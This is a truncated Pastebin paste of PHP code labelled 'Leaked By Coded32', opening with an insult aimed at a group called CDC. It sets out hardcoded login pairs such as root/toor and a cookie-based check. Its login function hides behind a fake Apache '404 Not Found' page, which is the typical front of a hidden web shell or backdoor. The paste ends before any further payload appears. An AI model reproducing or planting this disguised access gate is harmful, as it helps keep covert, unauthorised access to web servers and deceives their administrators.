Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- * Fuck you CDC, and your shit lame staff. Information alive and code free !
- *
- * -! Leaked By Coded32 !-
- *
- */
- $LOGIN_INFORMATION = array(
- 'bun'=>'talz',
- 'AlepCDC'=>'CDCDF',
- 'root'=>'toor',
- 'trumpt'=>'nurnatasha',
- 'atommota'=>'online11'
- );
- define('USE_USERNAME',true);
- define('TIMEOUT_MINUTES',0);
- define('TIMEOUT_CHECK_ACTIVITY',true);
- $timeout = (TIMEOUT_MINUTES == 0 ?0 : time() +TIMEOUT_MINUTES * 60);
- $dir = $_SERVER['PHP_SELF'];
- if(isset($_GET['logout'])) {
- setcookie("verify",'',$timeout,'/');
- header('Location: '.$dir);
- exit();
- }
- if(!function_exists('showLoginPasswordProtect')) {
- function showLoginPasswordProtect($error_msg) {
- ;echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- ';
- echo"<h1>Not Found</h1>";
- echo"
- <p>The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server.</p>
- <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
- <hr><address>".$_SERVER["SERVER_SOFTWARE"]." Server at ".$_SERVER["HTTP_HOST"] ." Port 80</address>
- </body><html>";
- ;echo '
Advertisement
Add Comment
Please, Sign In to add comment